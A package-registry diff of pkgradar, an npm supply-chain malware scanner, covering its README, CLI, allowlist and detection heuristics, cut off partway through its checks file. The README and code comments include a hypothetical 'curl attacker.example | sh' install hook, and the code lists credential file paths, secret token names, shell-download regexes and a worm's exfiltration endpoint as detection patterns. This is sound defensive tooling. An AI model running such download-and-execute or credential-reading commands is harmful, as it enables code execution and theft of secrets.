pkgradar 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +21 -0
- package/README.md +155 -0
- package/bin/pkgradar.js +158 -0
- package/data/allowlist.json +16 -0
- package/lib/checks.js +228 -0
- package/lib/osv.js +100 -0
- package/lib/scan.js +86 -0
- package/lib/stores.js +96 -0
- package/package.json +44 -0
package/LICENSE
ADDED
@@ -0,0 +1,21 @@
MIT License

Copyright (c) 2026 Nilay Rajderkar

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
package/README.md
ADDED
@@ -0,0 +1,155 @@
# pkgradar

A supply-chain scanner that reads the bytes you actually installed, not just the package names.

```
npx pkgradar
```

That is the whole thing. One command, no install, no config. It scans your project and every package cache on the machine, and tells you whether anything looks like malware.

## Why this exists

A lot of "supply-chain" CLIs work like this: download a list of advisories, check whether any package *name* in your project appears on it, print a scary verdict. So you run one, and it tells you something like:

```
Verdict: potential supply-chain exposure - 3 package hits
zod-to-json-schema@3.25.2
lightningcss-darwin-arm64@1.30.2
```

...even though `zod-to-json-schema` is a perfectly normal package downloaded millions of times a week, and the version you have was never touched. The advisory just *mentioned* that package's ecosystem. Name matching cannot tell the difference between "this package was trojanized" and "this package shares a name with something in a writeup".

`pkgradar` does the opposite. It opens the files. For every package it finds on disk it checks:

- **Install hooks that detonate.** `preinstall` / `install` / `postinstall` scripts, scored by whether they spawn processes, pipe `curl | bash`, read `~/.npmrc` / `~/.ssh` / `~/.aws/credentials`, or reference `NPM_TOKEN` / `GITHUB_TOKEN` / cloud credentials; a scoring sketch follows this list. (`prepare` is ignored on purpose: it does not run when a package is installed as a dependency.)
- **Known worm artifacts.** Files like `setup_bun.sh`, `bun_environment.js`, `migrate-repos.sh`, hard-coded Shai-Hulud exfiltration endpoints, and the rest of the Shai-Hulud / "Mini Shai-Hulud" indicator set. A bundled GitHub Actions workflow that runs a piped shell download or exfiltrates secrets is flagged too.
- **Obfuscated or packed payloads.** The `javascript-obfuscator` `_0x...` fingerprint, `eval` / `new Function` over `atob` / `Buffer.from(base64)`, `child_process` fed from decoded data, large base64 blobs. The "this file is just minified" signals are deliberately demoted so a normal bundled CLI does not drown the report.
- **Manifest oddities.** `bin` entries pointing outside the package or at a shell script.
- **Known advisories, precisely (optional).** With `--online` it cross-references [OSV.dev](https://osv.dev) by exact `(name, version)`, so you get real GHSA / CVE IDs instead of name collisions, and each advisory is reported at its own severity, so a moderate ReDoS in a dev tool does not shout as loud as an RCE.

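Here is a minimal sketch of the lifecycle-hook scoring idea. The token lists are abbreviated and the commands are hypothetical; the real implementation is `checkLifecycleHooks` in `lib/checks.js`, which also recognises benign build tools:

```js
// Sketch of the lifecycle-hook scoring (abbreviated token lists; the real
// check in lib/checks.js also whitelists build tools like node-gyp).
const NET = ['curl ', 'wget ', 'http://', 'https://'];
const SECRETS = ['NPM_TOKEN', 'GITHUB_TOKEN', 'AWS_SECRET_ACCESS_KEY'];

function scoreHook(cmd) {
  const hits = [...NET, ...SECRETS].filter((t) => cmd.includes(t));
  // a piped download-and-execute is an instant CRITICAL on its own
  const piped = /\b(curl|wget)\b[^|;&]*[|;&]+\s*(ba|z|d)?sh\b/.test(cmd);
  if (piped || hits.length >= 3) return 'CRITICAL';
  if (hits.length >= 1) return 'HIGH';
  return 'LOW'; // unrecognised hook: worth a glance, not an alarm
}

scoreHook('node-gyp rebuild');                           // 'LOW' (INFO in the real check)
scoreHook('curl -s https://attacker.example/x.sh | sh'); // 'CRITICAL' (hypothetical URL)
```
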
A small curated allowlist (`data/allowlist.json`) downgrades benign-but-trippy findings on famous packages (`vercel`, `corepack`, `core-js`, `esbuild`, and so on) to `INFO`. It never suppresses a hard worm indicator, because "a trusted package suddenly ships a worm" is exactly the attack worth catching.

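The matching rule for that allowlist is deliberately tiny: an entry is either an exact package name or a `@scope/*` prefix. A sketch of the semantics, mirroring `isAllowlisted` in `lib/scan.js`:

```js
// Allowlist matching: exact names, or '/*' entries that match by prefix
// (mirrors isAllowlisted in lib/scan.js).
const exact = new Set(), scopes = [];
for (const n of ['esbuild', '@esbuild/*', 'corepack']) {
  if (n.endsWith('/*')) scopes.push(n.slice(0, -1)); // keeps '@esbuild/'
  else exact.add(n);
}
const isAllowlisted = (name) => exact.has(name) || scopes.some((s) => name.startsWith(s));

isAllowlisted('esbuild');               // true
isAllowlisted('@esbuild/darwin-arm64'); // true  (scope prefix)
isAllowlisted('esbuild-evil');          // false (no substring matching)
```
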
## How it works

```
npx pkgradar
      |
      v
+-----------------------------------------------------------+
| 1. DISCOVER STORES                                        |
|    where package code is extracted on this machine        |
|                                                           |
|    project node_modules     pnpm in-project store (.pnpm) |
|    npm global root       npx ephemeral cache (~/.npm/_npx)|
|    bun cache      yarn v1 cache      yarn berry zips      |
|    pnpm global store                                      |
+-----------------------------------------------------------+
      |
      v
+-----------------------------------------------------------+
| 2. WALK EACH STORE                                        |
|    yield every package directory found                    |
|    dedupe by name @ version @ path                        |
+-----------------------------------------------------------+
      |
      v
+-----------------------------------------------------------+
| 3. INSPECT THE BYTES (per package, budgeted)              |
|                                                           |
|    +-------------------+  reads package.json scripts      |
|    | lifecycle-hook    |  pre/install/postinstall         |
|    +-------------------+  scored by what they touch       |
|                                                           |
|    +-------------------+  walks the package tree          |
|    | worm-ioc-file     |  matches known artifact names    |
|    | embedded-workflow |  inspects bundled CI workflows   |
|    +-------------------+                                  |
|                                                           |
|    +-------------------+  reads .js files (<= 1.5MB head  |
|    | suspicious-js     |  + 96KB tail, <= 24MB per pkg)   |
|    +-------------------+  obfuscation / eval / exfil combo|
|                                                           |
|    +-------------------+  reads package.json bin          |
|    | odd-bin           |                                  |
|    +-------------------+                                  |
+-----------------------------------------------------------+
               |
+--------------+--------------+
|                             |
(--online only)               |
v                             |
+---------------------------+ |
| 4. OSV.dev cross-check    | |
|    querybatch -> which    | |
|    pkgs have advisories   | |
|    then /v1/query each    | |
|    -> real severity       | |
+---------------------------+ |
|                             |
+--------------+--------------+
               |
               v
+-----------------------------------------------------------+
| 5. ALLOWLIST PASS                                         |
|    downgrade benign findings on famous packages to INFO   |
|    (never a hard worm indicator)                          |
+-----------------------------------------------------------+
      |
      v
+-----------------------------------------------------------+
| 6. REPORT                                                 |
|    verdict line, findings grouped by severity,            |
|    coloured badges, evidence paths, what-to-do            |
|    exit 0 clean / 1 findings / 2 error                    |
+-----------------------------------------------------------+
```

A finding object looks like this:

```
+------------------------------------------------------+
| package    name of the package                       |
| version    version on disk                           |
| store      which store it was found in               |
| code       lifecycle-hook | worm-ioc-file |          |
|            suspicious-js | odd-bin | osv-advisory ...|
| severity   CRITICAL | HIGH | MEDIUM | LOW | INFO     |
| message    what tripped, in plain words              |
| evidence   the file path or script line that did it  |
| dir        full path to the package on disk          |
+------------------------------------------------------+
```

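In `--json` mode the same fields come out as plain data. One entry of the `findings` array might look like this (the field set comes from `lib/scan.js`; the package and values here are made up for illustration):

```js
const finding = {
  severity: 'CRITICAL',
  sevNum: 4,                 // numeric rank, used for sorting and --min-sev
  code: 'lifecycle-hook',
  message: 'postinstall script, touches: curl , https://',
  evidence: '"postinstall": curl -s https://attacker.example/x.sh | sh',
  package: 'some-trojaned-pkg',   // hypothetical
  version: '1.4.2',
  store: 'project',
  dir: '/home/me/app/node_modules/some-trojaned-pkg',
};
```
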
## Usage

```bash
npx pkgradar                 # scan the current project plus every cache on this machine
npx pkgradar --online        # also cross-check OSV.dev advisories by exact version
npx pkgradar --min-sev high  # only show HIGH and CRITICAL (good for CI)
npx pkgradar --json          # machine-readable output
```

Exit codes: `0` clean, `1` findings at or above `--min-sev`, `2` scanner error. In CI: `npx pkgradar --min-sev high`.

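If you want to post-process results instead of relying on the exit code, parse the `--json` output; the `findings` array and `durationSeconds` field are emitted by `bin/pkgradar.js`. A minimal sketch, assuming Node 18+ with `npx` on `PATH`:

```js
const { execFileSync } = require('node:child_process');

let out;
try {
  out = execFileSync('npx', ['pkgradar', '--json'], { encoding: 'utf8' });
} catch (e) {
  out = e.stdout; // exit code 1 (findings present) still prints the full JSON report
}
const report = JSON.parse(out);
const serious = report.findings.filter((f) => f.severity === 'CRITICAL' || f.severity === 'HIGH');
console.log(`${serious.length} serious finding(s) in ${report.durationSeconds}s`);
```
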
| flag | meaning |
|---|---|
| `--online` | also query OSV.dev for known advisories (needs network) |
| `--json` | machine-readable output |
| `--min-sev LEVEL` | `critical`, `high`, `medium`, `low`, `info` (default `medium`) |
| `--stores LIST` | limit to `project,pnpm-project,npm-global,npx-cache,bun-cache,yarn-cache,yarn-berry` |
| `--no-allowlist` | do not downgrade findings on well-known packages |
| `--max-depth N` | max `node_modules` nesting depth (default `12`) |
| `--cwd DIR` | project directory to scan (default `.`) |

## What it is not

These are heuristics. They surface candidates, not verdicts. A clean run means "nothing tripped the checks on the bytes that are present", not "this is proven safe". A finding on a big bundled CLI is often a false positive, which is what the allowlist is for. A finding with a worm indicator string or a `curl | bash` postinstall is not a false positive. Read the evidence line, then decide.

Current coverage gaps, on the roadmap: yarn-berry packages are matched by name only (the zip archives are not opened yet), the pnpm global store and the npm `_cacache` tarballs are not extracted and scanned, and there is no npm-provenance / attestation check or typosquat-distance check yet.

`pkgradar` reads files only. It never executes any package code, install script, or workflow. It has zero runtime dependencies and uses only Node 18+ built-ins, which feels right for a tool you are meant to trust with your dependencies.

## License

MIT
package/bin/pkgradar.js
ADDED
@@ -0,0 +1,158 @@
#!/usr/bin/env node
'use strict';
const os = require('os');
const { scan, SEV } = require('../lib/scan');

const args = process.argv.slice(2);
const has = (f) => args.includes(f);
const val = (f, d) => { const i = args.indexOf(f); return i >= 0 && args[i + 1] ? args[i + 1] : d; };

if (has('-h') || has('--help')) {
  console.log(`pkgradar - content-based supply-chain scanner for npm / pnpm / yarn / bun

It opens the package files you actually installed and looks for what malware
does (install hooks, obfuscated payloads, known worm artifacts), instead of
just matching package names against an advisory list.

USAGE
  npx pkgradar [options]

OPTIONS
  --online           also cross-reference OSV.dev for known advisories (network)
  --json             machine-readable output
  --min-sev LEVEL    report findings at or above LEVEL
                     critical | high | medium | low | info   [default: medium]
  --stores LIST      comma list to limit which stores are scanned
                     project, pnpm-project, npm-global, npx-cache,
                     bun-cache, yarn-cache, yarn-berry
  --no-allowlist     do not downgrade findings on well-known packages
  --max-depth N      max node_modules nesting depth [default: 12]
  --cwd DIR          project directory to scan [default: .]
  -h, --help

EXIT CODES
  0 clean   1 findings at or above --min-sev   2 scanner error
`);
  process.exit(0);
}

const SEV_FROM_NAME = { critical: SEV.CRITICAL, high: SEV.HIGH, medium: SEV.MEDIUM, low: SEV.LOW, info: SEV.INFO };
const minSevName = (val('--min-sev', 'medium') || 'medium').toLowerCase();
const minSev = SEV_FROM_NAME[minSevName] ?? SEV.MEDIUM;

const useColor = process.stdout.isTTY && !process.env.NO_COLOR;
const e = (code) => useColor ? `\x1b[${code}m` : '';
const wrap = (code) => (s) => useColor ? `\x1b[${code}m${s}\x1b[0m` : `${s}`;
const C = {
  bold: wrap('1'), dim: wrap('2'), red: wrap('31'), grn: wrap('32'), ylw: wrap('33'),
  blu: wrap('34'), mag: wrap('35'), cyan: wrap('36'), gray: wrap('90'),
};
// severity badge: white text on a coloured background, padded
const badge = (sev) => {
  const bg = { CRITICAL: '41', HIGH: '45', MEDIUM: '43', LOW: '100', INFO: '100' }[sev] || '100';
  const fg = sev === 'MEDIUM' ? '30' : '97';
  const label = ` ${sev} `.padEnd(10);
  return useColor ? `\x1b[${bg};${fg};1m${label}\x1b[0m` : `[${sev}]`.padEnd(10);
};
const SEV_TEXT = { CRITICAL: C.red, HIGH: C.mag, MEDIUM: C.ylw, LOW: C.gray, INFO: C.gray };
const homeShort = (p) => (p && p.startsWith(os.homedir())) ? '~' + p.slice(os.homedir().length) : p;

function rule(ch = '─', n = 64) { return C.gray(ch.repeat(n)); }

(async () => {
  let res;
  const started = Date.now();
  try {
    res = await scan({
      cwd: val('--cwd', process.cwd()),
      online: has('--online'),
      minSev,
      maxDepth: parseInt(val('--max-depth', '12'), 10) || 12,
      stores: (val('--stores', '') || '').split(',').map((s) => s.trim()).filter(Boolean),
      noAllowlist: has('--no-allowlist'),
    });
  } catch (err) {
    console.error(C.red('pkgradar error: ') + (err && err.stack || err));
    process.exit(2);
  }
  const secs = ((Date.now() - started) / 1000).toFixed(1);

  if (has('--json')) {
    console.log(JSON.stringify({ ...res, durationSeconds: Number(secs) }, null, 2));
    process.exit(res.findings.some((f) => f.sevNum >= minSev) ? 1 : 0);
  }

  const counts = { CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0, INFO: 0 };
  for (const f of res.findings) counts[f.severity]++;
  const localFindings = res.findings.filter((f) => f.code !== 'osv-advisory');
  const osvFindings = res.findings.filter((f) => f.code === 'osv-advisory');
  const hits = res.findings.length;
  const worst = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'].find((k) => counts[k]) || null;

  // ---- header ----
  console.log('');
  console.log(` ${C.bold('pkgradar')} ${C.gray('v' + require('../package.json').version)} ${C.gray('content-based supply-chain scan')}`);
  console.log(` ${C.gray('project')} ${homeShort(res.cwd)} ${C.gray(res.stores.length + ' stores, ' + secs + 's')}`);
  console.log('');

  // ---- stores table ----
  const nameW = Math.max(...res.stores.map((s) => s.kind.length), 6);
  for (const s of res.stores) {
    console.log(` ${C.cyan(s.kind.padEnd(nameW))} ${C.dim(String(s.packages).padStart(5) + ' pkgs')} ${C.gray(homeShort(s.root))}`);
  }
  console.log(` ${C.gray('total:')} ${C.bold(res.totalPackages)} ${C.gray('unique package@version,')} ${C.bold(res.totalScanned)} ${C.gray('locations inspected')}`);
  if (res.osv && res.osv.error) console.log(` ${C.ylw('OSV lookup failed:')} ${C.dim(res.osv.error)}`);
  if (!res.osv && !has('--online')) console.log(` ${C.gray('tip: add')} ${C.dim('--online')} ${C.gray('to also cross-check known advisories on OSV.dev')}`);
  console.log('');

  // ---- verdict line ----
  if (!hits) {
    console.log(` ${C.grn('●')} ${C.bold('Verdict:')} ${C.grn('clean')} ${C.gray('- nothing tripped the heuristics at')} ${C.dim(minSevName)} ${C.gray('and above')}`);
    console.log(` ${C.gray(' (this inspects installed bytes; a clean run is not a proof of safety)')}`);
    console.log('');
    process.exit(0);
  }
  const summaryBits = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'].filter((k) => counts[k]).map((k) => SEV_TEXT[k](`${counts[k]} ${k.toLowerCase()}`));
  const dot = worst === 'CRITICAL' || worst === 'HIGH' ? C.red('●') : worst === 'MEDIUM' ? C.ylw('●') : C.gray('●');
  console.log(` ${dot} ${C.bold('Verdict:')} ${C.bold(hits + (hits === 1 ? ' finding' : ' findings'))} ${C.gray('(')}${summaryBits.join(C.gray(', '))}${C.gray(')')}`);
  if (localFindings.length && osvFindings.length) {
    console.log(` ${C.gray(' ' + localFindings.length + ' from inspecting installed code, ' + osvFindings.length + ' known advisories (OSV.dev)')}`);
  }
  console.log('');

  // ---- findings, grouped by severity, local first then OSV ----
  const ORDER = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'];
  const printGroup = (title, list) => {
    if (!list.length) return;
    console.log(` ${rule()}`);
    console.log(` ${C.bold(title)}`);
    console.log('');
    list.sort((a, b) => b.sevNum - a.sevNum || a.package.localeCompare(b.package));
    for (const f of list) {
      console.log(` ${badge(f.severity)} ${C.bold(f.package + '@' + f.version)} ${C.gray(f.store)} ${C.cyan(f.code)}`);
      console.log(` ${f.message}`);
      if (f.evidence) console.log(` ${C.gray('→ ' + f.evidence)}`);
      if (f.note) console.log(` ${C.gray('note: ' + f.note)}`);
      if (f.dir) console.log(` ${C.gray(homeShort(f.dir))}`);
      console.log('');
    }
  };
  printGroup('From inspecting installed code', localFindings);
  printGroup('Known advisories (OSV.dev)', osvFindings);

  // ---- next steps ----
  console.log(` ${rule()}`);
  console.log(` ${C.bold('What to do')}`);
  if (counts.CRITICAL || counts.HIGH) {
    console.log(` ${C.red('•')} Treat ${C.bold('CRITICAL / HIGH "installed code" findings')} as suspect: do not run install`);
    console.log(`   scripts, remove the package, clear the relevant cache, and rotate any npm /`);
    console.log(`   GitHub / cloud tokens this machine has held.`);
  }
  console.log(` ${C.gray('•')} Check a flagged version against the registry: ${C.dim('npm view <pkg> versions')} ${C.gray('and look at')}`);
  console.log(`   ${C.gray('publish dates and provenance.')}`);
  if (osvFindings.length) console.log(` ${C.gray('•')} OSV findings are the usual "known CVE in a dependency" set: ${C.dim('npm audit fix')} ${C.gray('/ bump.')}`);
  if (!has('--online')) console.log(` ${C.gray('•')} Re-run with ${C.dim('--online')} ${C.gray('to add OSV.dev advisory matching by exact version.')}`);
  console.log('');

  process.exit(res.findings.some((f) => f.sevNum >= minSev) ? 1 : 0);
})();
package/data/allowlist.json
ADDED
@@ -0,0 +1,16 @@
{
  "_comment": "Packages whose own first-party code is widely audited and known to trip the heuristics for benign reasons (bundled CLIs that read env tokens + hit the network, funding-message postinstalls, etc.). Findings on these are downgraded to INFO with a note. Match is by exact package name or by '@scope/' prefix entries ending in '/*'. Keep this list conservative — it is the one place a real compromise could hide, so entries should be famous, high-visibility packages only.",
  "names": [
    "core-js", "core-js-pure", "core-js-compat",
    "esbuild", "@esbuild/*",
    "vercel", "@vercel/*", "create-next-app", "next", "@next/*",
    "corepack", "npm", "@npmcli/*", "pnpm", "yarn",
    "d3", "d3-array", "d3-scale", "@edge-runtime/*",
    "webpack", "rollup", "vite", "turbo", "@turbo/*",
    "typescript", "ts-node", "tsx",
    "playwright", "playwright-core", "@playwright/*", "puppeteer", "puppeteer-core",
    "sharp", "@img/*",
    "@sentry/*", "@clerk/*", "firebase", "@firebase/*", "aws-sdk", "@aws-sdk/*",
    "node-gyp", "prebuild-install", "node-pre-gyp", "@mapbox/node-pre-gyp"
  ]
}
package/lib/checks.js
ADDED
@@ -0,0 +1,228 @@
'use strict';
// Content-based heuristics. Each check inspects the bytes actually on disk for one
// package and returns zero or more findings: { sev, code, msg, evidence }.
const fs = require('fs');
const path = require('path');

const SEV = { CRITICAL: 4, HIGH: 3, MEDIUM: 2, LOW: 1, INFO: 0 };

// ---- Known Shai-Hulud / Mini-Shai-Hulud worm indicators (filenames & content markers) ----
const WORM_FILENAMES = [
  'setup_bun.sh', 'setup_bun.js', 'bun_environment.js',
  'shai-hulud-workflow.yml', 'shai-hulud.yaml', 'shai-hulud.yml',
  'processor.sh', 'migrate-repos.sh', 'cloud.json', 'contents.json', 'environment.json',
  'truffleSecrets.json', 'actionsSecrets.json',
];
// High-confidence exfiltration endpoints / payload constants seen in Shai-Hulud-family
// worms. A mention of the string "shai-hulud" alone is NOT here on purpose — security
// tools (including this one) legitimately contain that word.
const WORM_HARD_MARKERS = [
  'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7',
  'eyJ3ZWJob29rIjp7InVybCI6', // base64 of the worm's config preamble
  'hxxps://', // defanged URL only ever appears in payloads, never real code
];
// "Soft" markers: only meaningful when several co-occur in one file.
const WORM_SOFT_MARKERS = [
  'shai-hulud', 'Shai-Hulud', 'shaihulud',
  'truffleSecrets', 'actionsSecrets', 'NpmModuleListWebhook',
  'migrate-repos', 'setup_bun', 'bun_environment',
];
const SECRET_NAMES = [
  'NPM_TOKEN', 'NPM_CONFIG_TOKEN', 'NODE_AUTH_TOKEN', 'GITHUB_TOKEN', 'GH_TOKEN', 'GHP_',
  'AWS_ACCESS_KEY', 'AWS_SECRET_ACCESS_KEY', 'AWS_SESSION_TOKEN',
  'GCP_', 'GOOGLE_APPLICATION_CREDENTIALS', 'AZURE_', 'DIGITALOCEAN_TOKEN',
  'SLACK_TOKEN', 'STRIPE_', 'OPENAI_API_KEY', 'ANTHROPIC_API_KEY',
];
const NET_TOKENS = ['curl ', 'wget ', 'http://', 'https://', 'fetch(', 'net.connect', 'dns.lookup', 'request(', 'axios', 'XMLHttpRequest'];
const EXEC_TOKENS = ['child_process', 'execSync', 'spawnSync', 'exec(', 'spawn(', 'node -e', 'node --eval', 'eval(', 'Function(', 'vm.runInThisContext'];
const ENCODE_TOKENS = ['base64 -d', "from('", 'Buffer.from(', 'atob(', 'fromCharCode', 'unescape('];

function readSafe(p, max = 2_000_000) {
  try {
    const st = fs.statSync(p);
    if (st.size > max) return { truncated: true, text: fs.readFileSync(p, 'utf8').slice(0, max), size: st.size };
    return { truncated: false, text: fs.readFileSync(p, 'utf8'), size: st.size };
  } catch { return null; }
}

// 1. Lifecycle install hooks (the #1 detonation vector)
function checkLifecycleHooks(pkg) {
  const out = [];
  const s = (pkg.manifest && pkg.manifest.scripts) || {};
  // Only the hooks that fire when a package is installed *as a dependency from the
  // registry*. `prepare` is excluded: it only runs on local installs / git deps.
  const HOOKS = ['preinstall', 'install', 'postinstall'];
  for (const h of HOOKS) {
    const cmd = s[h];
    if (!cmd) continue;
    const c = cmd.trim();
    // common, well-known native-build / tooling hooks
    const benign = /^(node-gyp\b|prebuild-install\b|node-pre-gyp\b|cmake-js\b|napi\b|neon\b|install-from-cache\b|node-waf\b|husky\b|patch-package\b|opencollective\b)/.test(c)
      || /^(node\s+)?(scripts\/)?install(\.js)?$/.test(c)
      || /^(ng-?ccc?|ngcc)\b/.test(c);
    const hits = new Set();
    for (const t of [...NET_TOKENS, ...EXEC_TOKENS, ...ENCODE_TOKENS]) if (cmd.includes(t)) hits.add(t);
    for (const t of SECRET_NAMES) if (cmd.toUpperCase().includes(t)) hits.add(t);
    if (cmd.includes('.npmrc') || cmd.includes('/.ssh/') || cmd.includes('.aws/credentials')) hits.add('credential-file');
    const piped = /\b(curl|wget|fetch)\b[^|;&]*[|;&]+\s*(ba|z|d)?sh\b/.test(cmd) || /\|\s*node\b/.test(cmd);
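    // e.g. "curl -s https://attacker.example/i.sh | bash" would set `piped`
    // (hypothetical URL); "node-gyp rebuild" only matches `benign` above.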

    let sev;
    if (hits.size >= 3 || piped) sev = SEV.CRITICAL;
    else if (hits.size >= 1) sev = SEV.HIGH;
    else if (benign) sev = SEV.INFO;
    else sev = SEV.LOW; // an unrecognised install hook — worth a glance, not an alarm
    out.push({ sev, code: 'lifecycle-hook', msg: `${h} script${hits.size ? ', touches: ' + [...hits].join(', ') : (benign ? ' (recognised build tool)' : ' (unrecognised command)')}`, evidence: `"${h}": ${cmd.slice(0, 240)}` });
  }
  return out;
}

// 2. Worm IOC files sitting inside the package
function checkWormFiles(pkg) {
  if (!pkg.dir) return [];
  const out = [];
  const stack = [pkg.dir];
  let budget = 4000;
  while (stack.length && budget-- > 0) {
    const d = stack.pop();
    let ents;
    try { ents = fs.readdirSync(d, { withFileTypes: true }); } catch { continue; }
    for (const e of ents) {
      if (e.name === 'node_modules') continue;
      const full = path.join(d, e.name);
      if (e.isDirectory()) { stack.push(full); continue; }
      const low = e.name.toLowerCase();
      if (WORM_FILENAMES.some((w) => low === w.toLowerCase())) {
        out.push({ sev: SEV.CRITICAL, code: 'worm-ioc-file', msg: `known worm artifact file: ${e.name}`, evidence: path.relative(pkg.dir, full) });
      }
      if (/(^|[\\/])\.github[\\/]workflows([\\/]|$)/.test(d) && /\.ya?ml$/i.test(low)) {
        // Many legit packages publish their whole repo (incl. .github). On its own this
        // is barely a signal, so it is INFO. A *malicious* workflow file would also be
        // caught by name (worm-ioc-file) or by content checks.
        const wf = readSafe(full, 200_000);
        const nasty = wf && /\b(curl|wget)\b[^|;&\n]*[|;&]+\s*(ba|z|d)?sh\b|secrets\.[A-Z_]+\b[\s\S]{0,80}(curl|nc |bash -c|http)/.test(wf.text);
        out.push(nasty
          ? { sev: SEV.CRITICAL, code: 'malicious-gh-workflow', msg: `bundled GitHub Actions workflow runs a piped shell download / exfiltrates secrets`, evidence: path.relative(pkg.dir, full) }
          : { sev: SEV.INFO, code: 'embedded-gh-workflow', msg: `package ships a GitHub Actions workflow (${e.name})`, evidence: path.relative(pkg.dir, full) });
      }
    }
  }
  return out;
}

// 3. Obfuscated / packed JS payload heuristics on the package's own JS
function checkObfuscation(pkg) {
  if (!pkg.dir) return [];
  const out = [];
  // Collect candidate JS files, then scan them under a strict per-package budget so a
  // package full of huge vendored bundles (typescript.js, lighthouse bundles, …) can't
  // make a scan run for minutes.
  const files = [];
  const stack = [pkg.dir];
  let dirBudget = 3000;
  while (stack.length && dirBudget-- > 0 && files.length < 200) {
    const d = stack.pop();
    let ents; try { ents = fs.readdirSync(d, { withFileTypes: true }); } catch { continue; }
    for (const e of ents) {
      if (e.name === 'node_modules' || e.name === 'test' || e.name === 'tests' || e.name === '__tests__' || e.name === 'fixtures') continue;
      const full = path.join(d, e.name);
      if (e.isDirectory()) { stack.push(full); continue; }
      if (/\.(c|m)?js$/.test(e.name)) { files.push(full); if (files.length >= 200) break; }
    }
  }
  const PER_FILE = 1_500_000;     // scan at most the first 1.5MB of any one file
  const TAIL = 96 * 1024;         // ...plus the last 96KB (payloads are often appended)
  let pkgByteBudget = 24_000_000; // ...and at most ~24MB across the whole package
  for (const f of files) {
    if (pkgByteBudget <= 0) break;
    let st; try { st = fs.statSync(f); } catch { continue; }
    let t, truncated = false;
    if (st.size > PER_FILE) {
      truncated = true;
      // big file: scan head + tail only
      let head = '', tail = '';
      try {
        const fd = fs.openSync(f, 'r');
        const hb = Buffer.alloc(Math.min(PER_FILE, st.size)); fs.readSync(fd, hb, 0, hb.length, 0); head = hb.toString('utf8');
        const tb = Buffer.alloc(Math.min(TAIL, st.size)); fs.readSync(fd, tb, 0, tb.length, st.size - tb.length); tail = tb.toString('utf8');
        fs.closeSync(fd);
      } catch { continue; }
      t = head + '\n' + tail;
      pkgByteBudget -= (head.length + tail.length);
    } else {
      const r = readSafe(f, PER_FILE);
      if (!r) continue;
      t = r.text;
      pkgByteBudget -= st.size;
    }
    const strong = []; // each strong reason alone is reportable
    const weak = [];   // weak reasons only matter in combination
    let critical = false;

    // --- hard worm markers: any one => critical ---
    for (const m of WORM_HARD_MARKERS) if (t.includes(m)) { strong.push(`worm IOC string: ${m}`); critical = true; }
    // --- soft worm markers: need >=3 distinct in one file (so a tool's advisory text won't trip it) ---
    const softHits = WORM_SOFT_MARKERS.filter((m) => t.includes(m));
    if (softHits.length >= 3) { strong.push(`co-occurring worm terms: ${softHits.slice(0, 6).join(', ')}`); }
    else if (softHits.length) weak.push(`worm term(s): ${softHits.join(', ')}`);

    // --- javascript-obfuscator signature ---
    const hexIds = (t.match(/_0x[a-f0-9]{4,6}\b/g) || []).length;
    if (hexIds > 80) strong.push(`${hexIds} _0x… mangled identifiers (javascript-obfuscator)`);
    else if (hexIds > 20) weak.push(`${hexIds} _0x… identifiers`);

    // --- code building & executing decoded data dynamically ---
    if (/(eval|new Function|Function\()\s*\(?\s*(atob|Buffer\.from\s*\([^)]*base64|unescape|decodeURIComponent)/.test(t)) strong.push('constructs & executes decoded payload (eval/Function over atob/Buffer.from)');
    if (/\bchild_process\b[\s\S]{0,400}\b(atob|Buffer\.from\s*\([^)]*base64)/.test(t)) strong.push('spawns a process from decoded data');

    // --- weak structural signals (modern bundlers do these constantly) ---
    const longest = t.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
    const minified = longest > 20000;
    if (minified && !/sourceMappingURL/.test(t.slice(-400))) weak.push(`minified (${longest.toLocaleString()}-char line, no sourcemap)`);
    const b64big = (t.match(/['"`][A-Za-z0-9+/]{1200,}={0,2}['"`]/g) || []).length;
    if (b64big) weak.push(`${b64big} large base64 literal(s)`);
    const readsSecret = SECRET_NAMES.some((n) => t.includes(n)) || /['"`][^'"`]*\.npmrc/.test(t) || t.includes('/.ssh/id_') || t.includes('.aws/credentials') || t.includes('.config/gh/hosts');
    const doesNet = /(fetch\s*\(|https?\.(get|request)\s*\(|new XMLHttpRequest|net\.connect|dgram\.)/.test(t)
      && /https?:\/\/(?!(registry\.npmjs\.org|nodejs\.org|raw\.githubusercontent\.com|api\.github\.com))[\w.-]+/.test(t);
    if (readsSecret) weak.push('references credential file/env names');
    if (doesNet) weak.push('makes an outbound network call to a non-package-registry host');

    // --- decide ---
    const reasons = [...strong, ...weak];
    let sev = null;
    if (critical) sev = SEV.CRITICAL;
    else if (strong.length) sev = SEV.HIGH;
    else if (readsSecret && doesNet && (minified || b64big || hexIds > 20)) sev = SEV.HIGH; // creds + net + obfuscation
    else if (weak.length >= 3) sev = SEV.MEDIUM;
    // (minified-alone, base64-alone, single weak signal => not reported: too noisy)
    if (sev != null) {
      out.push({ sev, code: 'suspicious-js', msg: reasons.join('; '), evidence: path.relative(pkg.dir, f) + (truncated ? ` (${(st.size / 1e6).toFixed(1)}MB file, scanned head ${(PER_FILE / 1e6).toFixed(1)}MB + tail ${(TAIL / 1024) | 0}KB)` : '') });
    }
  }
  return out;
}

// 4. Manifest oddities (cheap, offline)
